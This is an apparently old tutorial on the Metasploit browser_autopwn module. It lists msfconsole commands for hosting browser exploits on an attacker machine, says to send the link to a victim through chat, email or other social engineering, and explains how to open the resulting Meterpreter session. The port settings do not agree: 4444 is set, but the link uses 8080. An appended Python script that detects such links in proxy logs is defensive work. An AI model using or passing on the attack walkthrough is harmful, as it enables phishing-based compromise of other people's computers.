Nowadays, due to firewall restrictions and patch management policies, exploitation
of systems has become more difficult. However, one of the most efficient ways around
this is the use of client-side attacks.
Browser Autopwn is one such client-side attack. Here we will examine the
effectiveness of the Metasploit Browser Autopwn module.
The basic idea behind the module is that it creates a web server on our local
machine which hosts different kinds of browser exploits. When the user
opens the malicious link, the exploits are run
against the user's browser, and if one of them succeeds a
Meterpreter session opens.
Setup Required
Attacker: Backtrack 5
Victim: Windows 7
Step 1: Open a Backtrack terminal and type msfconsole
Step 2: Now type use auxiliary/server/browser_autopwn
Step 3: Now set LHOST, PORT, URIPATH
msf auxiliary(browser_autopwn) > set lhost 192.168.5.236
msf auxiliary(browser_autopwn) > set port 4444 (you can use port 80 also)
msf auxiliary(browser_autopwn) > set uripath /
msf auxiliary(browser_autopwn) > exploit
Send the link to the server to the victim via chat, email or any other
social engineering technique.
http://192.168.5.236:8080
You now have access to the victim's PC. Use "sessions -l" to list the sessions and get the session number, then type "sessions -i ID" to connect to that session.
Conclusion
Most organizations are behind
proxy firewalls, so only port 80 is allowed, and many employees use social
networks these days. An attacker can exploit that and send a malicious link to users through social
networks. So the Metasploit Browser Autopwn module is proof of how
dangerous it is to open links that come from untrusted sources.
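Seen from the proxy, the link used above has a recognisable shape: a raw IP address as the host and a non-default web port. The following is an added example, not part of the original post, of a check over web-proxy logs for that shape; the log format, the reason labels and the sample lines are constructed assumptions.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample proxy log, one request per line:
# "<timestamp> <client_ip> <method> <url>" (format is an assumption).
SAMPLE_LOG = """\
2012-05-01T09:14:02 10.0.0.21 GET http://intranet.example.com/index.html
2012-05-01T09:14:40 10.0.0.37 GET http://192.168.5.236:8080/
2012-05-01T09:15:03 10.0.0.21 GET http://www.example.org:80/news
2012-05-01T09:16:11 10.0.0.44 GET http://203.0.113.9/
2012-05-01T09:16:59 10.0.0.37 GET http://198.51.100.7:4444/a?b=1
malformed entry
"""
STANDARD_PORTS = {80, 443}

def is_ip_literal(host):
    """True when the URL host is a raw IPv4/IPv6 address, not a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def score_url(url):
    """Return the reasons a URL resembles an ad-hoc attacker web server."""
    parts = urlsplit(url)
    reasons = []
    if is_ip_literal(parts.hostname or ""):
        reasons.append("ip-literal-host")
    try:
        port = parts.port          # None when the URL names no port
    except ValueError:             # out-of-range or non-numeric port
        return reasons + ["invalid-port"]
    if port is not None and port not in STANDARD_PORTS:
        reasons.append("non-standard-port")
    return reasons

def suspicious_requests(log_text, min_reasons=2):
    """List (client, url, reasons) for requests with enough reasons."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:       # skip malformed lines
            continue
        _ts, client, _method, url = fields
        reasons = score_url(url)
        if len(reasons) >= min_reasons:
            hits.append((client, url, reasons))
    return hits
```

A link served on port 80, the case the conclusion mentions, produces only the `ip-literal-host` reason, so call `suspicious_requests(log, min_reasons=1)` to surface those as well.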